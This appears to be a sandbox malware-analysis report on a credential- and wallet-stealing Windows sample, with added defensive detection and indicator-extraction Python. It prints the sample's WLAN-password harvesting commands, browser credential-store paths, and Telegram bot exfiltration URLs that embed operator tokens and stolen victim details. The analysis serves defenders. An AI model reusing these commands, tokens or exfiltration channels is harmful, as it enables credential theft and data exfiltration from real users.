Source: C:\Users\user\Desktop\vYz1Z2heor.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 100000
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 99875
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 99765
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 99656
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 99547
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 99432
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 99327
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 99219
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 99094
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 98984
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 98875
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 98754
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Thread delayed: delay time: 98640
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: tasks.office.comVMware20,11696501413o
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: dev.azure.comVMware20,11696501413j
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: vYz1Z2heor.exe, 00000000.00000002.3833356151.0000000000853000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAPP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDrive
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: outlook.office.comVMware20,11696501413s
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: vYz1Z2heor.exe; Binary or memory string: vmware
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: global block list test formVMware20,11696501413
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: vYz1Z2heor.exe; Binary or memory string: VMwareVBox
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: discord.comVMware20,11696501413f
Source: tmpD645.tmp.dat.0.dr; Binary or memory string: AMC password management pageVMware20,11696501413
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Code function: 0_2_05180B20 LdrInitializeThunk, 0_2_05180B20
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid

Language, Device and Operating System Detection

Source: Yara match; File source: vYz1Z2heor.exe, type: SAMPLE
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Queries volume information: C:\Users\user\Desktop\vYz1Z2heor.exe VolumeInformation
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\Desktop\vYz1Z2heor.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe; Queries volume information: C:\ VolumeInformation
                              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\vYz1Z2heor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match  File source: vYz1Z2heor.exe, type: SAMPLE
Source: Yara match  File source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: vYz1Z2heor.exe, 00000000.00000002.3836768735.00000000049F0000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\vYz1Z2heor.exe  WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match  File source: vYz1Z2heor.exe, type: SAMPLE
Source: Yara match  File source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
(The report lists these five sources three times in this section, one list per matching Yara rule, and the process memory space entry once more on its own; the repeats are collapsed here.)
Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: Electrum
Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: q5\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: \Exodus\exodus.wallet
Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: \Ethereum\keystore (listed twice in the report)
Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: Exodus
Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: Ethereum
Source: vYz1Z2heor.exe, 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp  String found in binary or memory: \Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\vYz1Z2heor.exe  Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\SysWOW64\cmd.exe  Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\vYz1Z2heor.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\vYz1Z2heor.exe  File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\vYz1Z2heor.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\vYz1Z2heor.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\vYz1Z2heor.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
Source: C:\Users\user\Desktop\vYz1Z2heor.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\vYz1Z2heor.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
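The WLAN-profile dump (cmd.exe /C chcp 65001 && netsh wlan show profile | findstr All, followed by netsh wlan show networks mode=bssid), the opens of browser credential and history stores by a process that is not a browser, and the root\SecurityCenter2 AntivirusProduct query are all visible in ordinary endpoint telemetry. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that runs three detection rules over constructed process-creation, file-open and WMI-query records modelled on this report's entries. The event schema, the rule names, the system-path allow-list and the extra store names beyond those on this page (the Chromium Cookies file and Firefox logins.json and key4.db) are assumptions of the example; the constructed events reproduce the paths and command lines reported above, plus one benign chrome.exe open that must not fire.

```python
"""Detection rules for the WLAN harvest, browser-store access and AV discovery
behaviour recorded in this report, run over constructed endpoint telemetry."""
import re
from pathlib import PureWindowsPath

# Browser credential/history stores opened by the sample in this report, plus the
# Chromium "Cookies" and Firefox "logins.json"/"key4.db" stores (example's addition).
BROWSER_STORES = {"login data", "web data", "cookies", "history",
                  "cookies.sqlite", "places.sqlite", "logins.json", "key4.db"}
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# netsh wlan sub-commands seen in the report: profile enumeration (a per-profile
# "key=clear" dump also matches) and the BSSID survey used for Wi-Fi geolocation.
WLAN_RE = re.compile(r"netsh(?:\.exe)?\s+wlan\s+show\s+(profile|networks)\b", re.I)


def _base(path):
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return PureWindowsPath(path).name.lower()


def _is_system_path(image):
    """Assumed allow-list: binaries under the Windows and Program Files trees."""
    return image.lower().startswith(("c:\\windows\\", "c:\\program files"))


def analyse(events):
    """Return (rule, image, detail) alerts for a list of event dicts.
    Event kinds: 'process' (image, parent_image, command_line),
    'file' (image, path) and 'wmi' (image, namespace, query)."""
    alerts = []
    for ev in events:
        kind, image = ev["kind"], ev["image"]
        if kind == "process":
            m = WLAN_RE.search(ev.get("command_line", ""))
            if m:
                alerts.append(("wlan_credential_harvest", image,
                               f"{m.group(1)} via parent {_base(ev.get('parent_image', ''))}"))
        elif kind == "file":
            # Credential/history database touched by something other than the browser.
            if _base(ev["path"]) in BROWSER_STORES and _base(image) not in BROWSER_IMAGES:
                alerts.append(("browser_store_access_by_foreign_process", image, ev["path"]))
        elif kind == "wmi":
            ns = ev["namespace"].lower().rstrip("\\")
            if (ns.endswith("securitycenter2") and "antivirusproduct" in ev["query"].lower()
                    and not _is_system_path(image)):
                alerts.append(("security_software_discovery", image, ev["query"]))
    return alerts


# Constructed telemetry mirroring the process tree and file opens in this report.
SAMPLE = r"C:\Users\user\Desktop\vYz1Z2heor.exe"
EVENTS = [
    {"kind": "process", "image": r"C:\Windows\SysWOW64\cmd.exe", "parent_image": SAMPLE,
     "command_line": '"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All'},
    {"kind": "process", "image": r"C:\Windows\SysWOW64\netsh.exe",
     "parent_image": r"C:\Windows\SysWOW64\cmd.exe",
     "command_line": "netsh wlan show networks mode=bssid"},
    {"kind": "file", "image": SAMPLE,
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"kind": "file", "image": SAMPLE,
     "path": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite"},
    # Benign: the browser itself opening its own store must not alert.
    {"kind": "file", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"kind": "wmi", "image": SAMPLE, "namespace": r"root\SecurityCenter2",
     "query": "Select * from AntivirusProduct"},
]

if __name__ == "__main__":
    for rule, image, detail in analyse(EVENTS):
        print(f"[{rule}] {image}: {detail}")
```

The WLAN rule fires at the cmd.exe level as well as on the netsh.exe child, so the parent recorded in the detail is what identifies the launching binary; on the report's chain that is vYz1Z2heor.exe rather than an interactive shell.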

Remote Access Functionality

Source: Yara match  File source: vYz1Z2heor.exe, type: SAMPLE
Source: Yara match  File source: 0.0.vYz1Z2heor.exe.c0000.0.unpack, type: UNPACKEDPE
Source: Yara match  File source: 00000000.00000000.1374100041.00000000000C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match  File source: 00000000.00000002.3833961321.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: vYz1Z2heor.exe PID: 8020, type: MEMORYSTR
(The report lists these five sources twice in this section, one list per matching Yara rule, and the process memory space entry once more on its own; the repeats are collapsed here.)
MITRE ATT&CK Matrix

Observed techniques per tactic. The number before each technique is the report's count badge, reproduced as shown; matrix cells without a badge (for example Remote Services or Exfiltration Over Bluetooth) are unhighlighted placeholders and are omitted.

Reconnaissance: no highlighted technique
Resource Development: no highlighted technique
Initial Access: no highlighted technique
Execution: 131 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 1 Scheduled Task/Job
Defense Evasion: 11 Disable or Modify Tools; 111 Obfuscated Files or Information; 1 DLL Side-Loading; 1 Masquerading; 251 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 1 OS Credential Dumping; 1 Input Capture
Discovery: 2 File and Directory Discovery; 124 System Information Discovery; 341 Security Software Discovery; 1 Process Discovery; 251 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: no highlighted technique
Collection: 1 Archive Collected Data; 2 Data from Local System; 1 Screen Capture; 1 Input Capture
Command and Control: 2 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol
Exfiltration: no highlighted technique
Impact: 1 Data Encrypted for Impact
Behavior Graph (ID 1495519, sample vYz1Z2heor.exe, start date 20/08/2024, architecture WINDOWS, score 100)

Network nodes:
  api.telegram.org (149.154.167.220, ports 443, 49703, 49704; TELEGRAMRU, United Kingdom): Uses the Telegram API (likely for C&C communication)
  pastebin.com (172.67.19.24, ports 443, 49709; CLOUDFLARENETUS, United States): Connects to a pastebin service (likely for C&C)
  3 other IPs or domains

Graph-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures

Process tree:
  vYz1Z2heor.exe (started; graph counters 15 and 132)
    dropped: C:\Users\user\AppData\...\PALRGUCVEH.docx (ASCII; listed twice), C:\Users\user\AppData\...\KLIZUSIQEN.jpg (ASCII), 2 other malicious files
    signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Found many strings related to Crypto-Wallets (likely being stolen); Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines); 3 other signatures
    cmd.exe (counter 1): Uses netsh to modify the Windows network and firewall settings; Tries to harvest and steal WLAN passwords
      netsh.exe (counter 2), conhost.exe, findstr.exe (counter 1), chcp.com (counter 1)
    cmd.exe (counter 1)
      netsh.exe (counter 2), conhost.exe, chcp.com (counter 1)

Antivirus and scanner results for the sample

Source | Detection | Scanner | Label
vYz1Z2heor.exe | 72% | Virustotal |
vYz1Z2heor.exe | 87% | ReversingLabs | ByteCode-MSIL.Backdoor.AsyncRat
vYz1Z2heor.exe | 100% | Joe Sandbox ML |

No Antivirus matches
URL scanner results

Source | Detection | Scanner | Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://support.mozilla.org | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283 | 0% | Avira URL Cloud | safe
https://duckduckgo.com/chrome_newtab | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795480469 | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe
https://api.telegram.org | 0% | Avira URL Cloud | safe
https://duckduckgo.com/ac/?q= | 0% | Avira URL Cloud | safe
https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13 | 0% | Avira URL Cloud | safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=57954 | 0% | Avira URL Cloud | safe
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 | 0% | Avira URL Cloud | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | Avira URL Cloud | safe
https://api.telegram.orgD | 0% | Avira URL Cloud | safe
http://pastebin.comd | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 | 0% | Avira URL Cloud | safe
http://icanhazip.com/ | 0% | Avira URL Cloud | safe
https://pastebin.com/raw/7B7P | 0% | Avira URL Cloud | safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJp | 0% | Avira URL Cloud | safe
https://github.com/LimerBoy/StormKitty | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-20%205:06:19%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20506013%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%201PKE1OBC%0ARAM:%204095MB%0AHWID:%205D1E7ABD56%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%201%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%2011%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2030%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2020%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True | 0% | Avira URL Cloud | safe
https://github.com/LimerBoy/StormKitty0& | 0% | Avira URL Cloud | safe
http://api.telegram.orgd | 0% | Avira URL Cloud | safe
https://api.telegram.org/file/bot | 0% | Avira URL Cloud | safe
http://pastebin.com | 0% | Avira URL Cloud | safe
https://pastebin.com | 0% | Avira URL Cloud | safe
http://api.telegram.org | 0% | Avira URL Cloud | safe
https://pastebin.com/raw/7B75u64B | 0% | Avira URL Cloud | safe
https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795 | 0% | Avira URL Cloud | safe
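The Telegram Bot API URLs above embed the operator's bot credential (the bot<id>:<secret> path element) and the destination chat_id, and the pastebin raw URL is the configuration fetch. Those fields, not the IP addresses, are the durable indicators: api.telegram.org and pastebin.com are shared services that cannot be blocked wholesale, while a bot token and chat_id identify this operator. The Python below is an added example, not taken from the report or the sample, that pulls those fields out of memory strings. Its input list quotes URLs from this report verbatim, except the entry marked shortened, which is cut down from the report's long sendMessage URL; the regular expressions, the output field names and the handling of truncated strings are this example's own.

```python
"""Extract Telegram-bot and pastebin C2 indicators from memory strings such as
the URL list in this report. Input strings are quoted from the report (one is
marked as shortened from the report's long sendMessage URL)."""
import re
from urllib.parse import parse_qs

# bot<numeric id>:<secret>/<method>?<query>; template strings without a token
# ("https://api.telegram.org/bot", ".../file/bot") deliberately do not match.
TG_RE = re.compile(
    r"https?://api\.telegram\.org/bot(\d+):([A-Za-z0-9_-]{20,})/(\w+)(\?\S*)?", re.I)
# pastebin raw paste ids are 8 alphanumerics; a truncated "7B7P" is ignored.
PASTEBIN_RE = re.compile(r"https?://pastebin\.com/raw/([A-Za-z0-9]{8})\b")


def telegram_iocs(strings):
    """One dict per Telegram Bot API URL: bot_id, full token, API method,
    chat_id (or None) and the percent-decoded 'text' parameter (or None)."""
    hits = []
    for s in strings:
        for m in TG_RE.finditer(s):
            bot_id, secret, method, query = m.groups()
            # parse_qs percent-decodes values, so the text is already in clear.
            params = parse_qs((query or "?")[1:], keep_blank_values=True)
            hits.append({
                "bot_id": bot_id,
                "token": f"{bot_id}:{secret}",
                "method": method,
                "chat_id": params.get("chat_id", [None])[0],
                "text": params["text"][0] if "text" in params else None,
            })
    return hits


def c2_summary(strings):
    """Collapse the hits into the indicators worth hunting for: unique bot
    tokens, chat ids, API methods used, and pastebin raw paste ids."""
    tg = telegram_iocs(strings)
    return {
        "bot_tokens": sorted({h["token"] for h in tg}),
        "chat_ids": sorted({h["chat_id"] for h in tg if h["chat_id"]}),
        "methods": sorted({h["method"] for h in tg}),
        "pastebin_raw_ids": sorted({m.group(1) for s in strings
                                    for m in PASTEBIN_RE.finditer(s)}),
    }


REPORT_STRINGS = [
    "https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795480469",
    "https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956",
    "https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders...",
    # shortened from the report's long WorldWind results message
    "https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0AExternal%20IP:%208.46.123.33&parse_mode=Markdown",
    "https://api.telegram.org/bot",       # template string, no credential
    "https://api.telegram.org/file/bot",  # template string, no credential
    "https://pastebin.com/raw/7B75u64B",
    "https://pastebin.com/raw/7B7P",      # truncated memory string
    "http://pastebin.comd",               # memory debris
]

if __name__ == "__main__":
    for h in telegram_iocs(REPORT_STRINGS):
        print(h["method"], h["chat_id"], repr(h["text"]))
    print(c2_summary(REPORT_STRINGS))
```

Treat the extracted token as a credential in your own tooling (redact it in tickets and shared reports), and hunt for the token string and chat_id in proxy logs rather than for the Telegram IP, which legitimate clients also reach.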
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.mylnikov.org | 172.67.196.114 | true | false |  | unknown
api.telegram.org | 149.154.167.220 | true | true |  | unknown
pastebin.com | 172.67.19.24 | true | true |  | unknown
icanhazip.com | 104.16.185.241 | true | false |  | unknown
157.184.7.0.in-addr.arpa | unknown | unknown | true |  | unknown
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7293375371:AAFwIvNWcuknS3y3mtsx4yNSSTkj8NCF_ko/sendDocument?chat_id=5795480469 | true | Avira URL Cloud: safe | unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 | false | Avira URL Cloud: safe | unknown
http://icanhazip.com/ | false | Avira URL Cloud: safe | unknown
https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 | true | Avira URL Cloud: safe | unknown
